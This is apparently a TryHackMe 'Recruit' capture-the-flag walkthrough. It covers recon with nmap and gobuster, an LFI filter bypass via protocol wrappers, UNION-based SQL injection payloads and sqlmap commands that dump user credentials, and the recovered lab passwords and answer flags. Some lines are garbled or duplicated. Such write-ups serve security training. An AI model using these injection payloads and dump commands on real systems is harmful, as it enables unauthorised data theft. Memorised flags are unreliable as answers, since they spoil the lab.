Recruit | TryHackMe | Walkthrough

Initial Access

Nmap

nmap -sS -vv -p- -A recruit.thm

nmap -sS -vv -p- -A recruit.thm

• -sS (TCP SYN scan) → Performs a half‑open scan by sending SYN packets and analyzing responses without completing the TCP handshake. Faster and stealthier than a full connect scan, but still detectable.
• -vV (very verbose) → Increases output detail, showing more information about each port and service.
• -p- → Scans all 65,535 TCP ports (from 1 to 65535).
• -A (Aggressive scan)

Gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u recruit.thm -x php,txt,js,pdf

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u recruit.thm -x php,txt,js,pdf

• gobuster dir → Run Gobuster in directory/file brute‑forcing mode.
• -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt → Wordlist to use. This file contains thousands of common directory and file names.
• -u recruit.thm → Target URL (the web application you're testing).
• -x php,txt,js,pdf → File extensions to append to each word in the list. For example, Gobuster will try login.php, config.txt, script.js, manual.pdf, etc.

Local File Institution(User)

1. Get Username

2. Get Password

3. Bypass filter

• Normally, basic LFI filters look for suspicious patterns like ../ (directory traversal) and block them.
• However, some weak filters only check for dots and slashes, but ignore protocol wrappers (like php://, file://, [http://](http://).))..)
• In such cases, attackers may try to trick the application into loading local files by using these wrappers instead of direct traversal.

5. Login using Credential

hr:hrpassword123

hr:hrpassword123

SQL injection(Manual)

1. Runs this payloads successfully without errors, that indicates the original query being injected has 4 columns in its result set.

' union select 1,2,3,4-- -

' union select 1,2,3,4-- -

2. Enumerate tables from the database

' union select table_name,1,2,3 from information_schema.tables-- -

' union select table_name,1,2,3 from information_schema.tables-- -

• information_schema.tables is a special metadata table available in many SQL databases (like MySQL, PostgreSQL). It contains the names of all tables in the database.
• table_name is the column that stores each table's name.
• The dummy values (1,2,3) are just placeholders to match the number of columns in the original query.

3. Enumerate the column names of the users table.

' union select column_name,1,2,3 from information_schema.columns where table_name='users'-- -

' union select column_name,1,2,3 from information_schema.columns where table_name='users'-- -

• information_schema.columns → A special metadata table that stores details about every column in every table.
• column_name → The field that contains the actual names of the columns.
• WHERE table_name='users' → Filters the results so only columns belonging to the users table are returned.
• 1,2,3 → Dummy values to pad out the query so the number of columns matches the original vulnerable query.
• -- - → SQL comment to ignore the rest of the original query.

4. Extract sensitive data from the users table.

' union select 1,password,2,username from users-- -

' union select 1,password,2,username from users-- -

• ' → Closes the current string in the vulnerable query.
• UNION SELECT 1,password,3,username → Tries to append a new query that outputs four columns. Two are dummy values (1 and 3), while the other two are actual fields (password and username).
• FROM users → Specifies the target table (users).
• -- - → Comments out the rest of the original query so it doesn't interfere.

SQL injection(SQLMAP)

1. Intercept Request and Save item

2. Run sqlmap

sqlmap -r req.txt --dbs

sqlmap -r req.txt --dbs

• -r req.txt → Tells sqlmap to read the raw HTTP request from the file req.txt. This file usually contains the full request (headers, cookies, parameters, etc.) that you captured with a proxy like Burp or from your browser.
• --dbs → Instructs sqlmap to enumerate and list all databases that the vulnerable application's backend has access to.

3. Dump all the contents of a specific database recruit_db, the typical sqlmap command is:

sqlmap -r req.txt -D recruit_db --dump-all

sqlmap -r req.txt -D recruit_db --dump-all

Admin

Login using credential

admin:admin@001admin

admin:admin@001admin

What is the flag value after logging in as a normal user?

THM{LOGGED_IN_USER}

THM{LOGGED_IN_USER}

What is the flag value after logging in as admin?

THM{LOGGED_IN_ADM1N1}

THM{LOGGED_IN_ADM1N1}